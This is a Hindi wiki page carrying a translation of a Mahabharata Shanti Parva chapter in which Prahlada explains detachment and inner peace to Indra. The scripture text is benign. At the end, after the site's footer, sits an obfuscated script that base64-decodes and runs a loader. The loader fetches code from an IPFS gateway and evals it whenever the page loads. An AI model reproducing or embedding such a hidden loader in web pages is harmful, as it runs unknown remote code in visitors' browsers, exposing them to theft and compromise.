महाभारत शान्ति पर्व अध्याय 222 भाग 6

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ

द्वाविंशत्‍यधिकद्विशततम (222) अध्याय: शान्ति पर्व (मोक्षधर्म पर्व)

महाभारत: शान्ति पर्व: द्वाविंशत्‍यधिकद्विशततम अध्याय: भाग 6 का हिन्दी अनुवाद

प्रकृति और उसके कार्यो के प्रति मेरे मन में न तो राग है, न द्वेष । मैं किसी को न अपना द्वेषी समझता हॅू और न आत्‍मीय ही मानता हॅू । इन्‍द्र ! मुझे ऊपर (स्‍वर्ग की), नीचे (पातालकी) तथा बीच लोक (मर्त्‍यलोक) की भी कभी कामना नहीं होती । ज्ञान विज्ञान और ज्ञेय की निमित्‍त भी मेरे लिये कोई कर्म आवश्‍यक नहीं है । इन्‍द्र ने कहा – प्रहलादजी ! जिस उपाय से ऐसी बुद्धि और इस तरह की शान्ति प्राप्‍त होती है, उसे पूछता हॅू ।आप मुझे अच्‍छी तरह उसे बताइ। प्रहलाद ने कहा – इन्‍द्र ! सरलता, सावधानी, बुद्धि की निर्मलता, चित्‍त की स्थिरता तथा बड़े बूढ़ोंकी सेवा करने से पुरूष को महत् पद की प्राप्ति होती है ।
इन गुणों को अपनाने पर स्‍वभाव में ज्ञान प्राप्‍त होता है, स्‍वभाव से ही शान्ति मिलती है तथा जो कुछ भी तुम देख रहे हो, सब स्‍वभाव से ही प्राप्‍त होता है। राजन् ! दैत्‍यराज प्रहलाद के इस प्रकार कहनेपर इन्‍द्र को बड़ा विस्‍मय हुआ । उन्‍होने बहुत प्रसन्‍न होकर उनके वचनों की प्रशंसा की। इतना ही नही, त्रिलोकीनाथ देवेश्‍वर इन्‍द्र ने उस समय दैत्‍यों और असुरों के स्‍वामी पहलाद का पूजन किया और उनकी आज्ञा लेकर वे अपने निवास स्‍थान स्‍वर्गलोक को चले गये ।

इस प्रकार श्रीमहाभारत शान्तिपर्व के अन्‍तर्गत मोक्षधर्मपर्व में इन्‍द्र और प्रहलाद का संवादनामक विषयक दो सौ बाईसवॉ अध्‍याय पूरा हुआ ।


« पीछे आगे »

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>